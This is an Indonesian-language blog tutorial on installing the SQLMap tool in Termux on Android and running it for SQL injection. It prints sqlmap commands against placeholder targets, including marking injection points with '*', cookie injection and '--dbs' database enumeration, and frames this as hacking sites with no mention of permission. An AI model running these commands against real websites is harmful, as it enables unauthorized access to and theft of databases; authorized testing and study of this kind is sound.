Halo gais, kali ini saya akan membahas tentang cara menginstal SQLMap di termux dan beberapa halengenai SQLMap, dan cara untuk menggunakan SQLMap untuk melakukan serangan SQL Injection gais.
Tutorial SQLMap Termux
Oke sebelum kalian mengetahui bagaimana cara instal SQLMap di termux adabaiknya kalian kenal lebih dekat apa itu QSLMap, dan beberapa istilah yang masih sangat erat dengan QSLMap ini.
Apa Itu SQLMap
SQLMap adalah tool uji penetrasi open source yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih basis data server.
Jadi sqlmap ini adalah tools yang dapat mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. Dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.
Apa Itu SQL Injection
SQL injection adalah teknik hacking di mana attacker dapat menyisipkan perintah-perintah SQL melalu URL untuk di eksekusi oleh database. Bug atau vulnerability ini terjadi karena kelalian seorang programer atau webmaster dalam melakukan pemograman web seperti tidak difilternya variabel dalam web tersebut.
Apa Itu Database
Database adalah kumpulan informasi yang disimpan di dalam komputer atau webserver secara sistematik yang berguna untuk memperoleh informasi dari basis data tersebut.
Cara Instal QSLMap di Android
Oke, kita masuk ke pokon inti pembahasan, yaitu mengintal QSLMap di hp Android kita.
Untuk menginstal tool QSLMap di Android kamu tidak perlu rooting hp Android kamu. cukup gunakan aplikasi emulator linuk yaitu termux.
Instalasi SQLMap
- Download Termuk
- Git Hub SQLMap https://github.com/sqlmapproject/sqlmap
Comand Instal SQLMap di Termuk
- $ pkg update
- $ pkg upgrade
- $ pkg install python2
- $ pkg install git
- $ git clone https://github.com/sqlmapproject/sqlmap
Tutorial Instalasi SQLMap di Termux
Untuk meng-instal SQLMap di termux, kamu cukup memasukan perintah-perintah di atas. untuk penjelasannya langsung, silahkan simak tutorial SQLMap Termux Android ini gais:
Langkah 1: Download dan buka aplikasi termux kalian gais, jika sudah kebuka, masukan comad berikut: $ pkg update dan pkg upgrade untuk lebih jelasnya silahkan bacar cara instal dan menggunaka termuk untuk pemula.
Langkah 2: Selanjutnya yaitu menginstal bahasa progam python di termux agar SQLMap bisa berjalan di termux, masukan perintah: $ pkg install python2
Langkah 3: Instal Git untuk mengkloning SQLMap dari git hub, masukan perintah: $ pkg install git
Langkah 4: Cloning SQLMap dari git hubnya, masukan perintah: $ git clone https://github.com/sqlmapproject/sqlmap
Tunggu hingga proses download SQLMap dari git hub selesai, munkin agak lama, tergantung kecepatan koneksi internet kalian.
Oke, Kamu sudah berhasil menginstal SQLMap di hp Android kamu.
…Bagaimana cara menggunakan SQLMap?
Cara Menggunakan SQLMap
Untuk menggunakan SQLMap di hp Android menggunakan termuk tukuplah mudah, kamu cukuo memasukan perintah untuk menjalankan SQLMap di termux:
Comand SQLMap
- $ ls
- $ cd sqlmap
- $ python2 sqlmap.py
Menjalankan SQLMap di Termux
Langkah 1: Untuk membuka paket yang terinstal di aplikasi termuk, masulan perintah: $ ls
Langkah 2: Selanjutnya, menjalankan atau membuka paket yang terinstal di termux, disini kita akan membuka paket SQLMap. Jadi masukan perintah: $ cd sqlmap klik enter
Langkah 3: Masukan perintah berikutnya: $ python2 sqlmap.py
Tunggu hinga selesai, jika SQLMap sudah berhasil kalian instal, kurang lebih seperti ini penampakannya:
Selamat SQLMap sudah derhasil anda pasang di termux.
Sesuai yang kita jelaskan di atas, SQLMap adalah tool uji penetrasi website. untuk melakukan injec menggunakan SQLMap simak panduan berikut:
Hack Menggunakan QSLMap
Untuk melakukan SQL Ijection menggunakan SQLMap di termux, anda cukup memasukan perintah:
$ python2 sqlmap.py -u (url)
Url adalah target url website yang akan kalian serangenggunaka teknik SQL Injection.
Contoh: $ python2 sqlmap.py -u target.com/a.php?b=1
Menentukan Inject Point pada SQLmap
Menentukan Inject Point pada SQLmap. Kita sering melihat tutorial bagaimana menginjeksi url yang vuln. Namun rata-rata tutorial yang diberikan adalah basic sqlmap dimana inject pointnya selalu sama yakni target.com/a.php?b=1. Nah, bagaimana jika inject pointnya berbeda? Di Sqlmap kita bisa menentukan inject pointnya.
Misalnya begini:
https://target.com/article.php?page=2&id=5
Dan inject pointnya ada di parameter id. Maka perintahnya
python2 sqlmap -u "https://target.com/article.php?page=2&id=5*" --dbs
Ya, hanya dengan menambahkan karakter * di inject point. Hal ini juga berlaku jika yang diinject adalah halaman statis html. Misalnya vuln di
https://target.com/article-315'-abcde.html
Maka di sqlmap perintahnya
python2 sqlmap -u "https://target.com/article-315*-abcde.html" --dbs
Begitu juga dengan sqlmap post data, inject pointnya bisa ditentukan, misalnya
python2 sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"
Itulah beberapa hal yang harus anda pelajari jika kami ingin meng instal SQLMap di termux dan menggunakan SQLMap untuk uji penetrasi.
Sumbar: xploit.linuxsec.org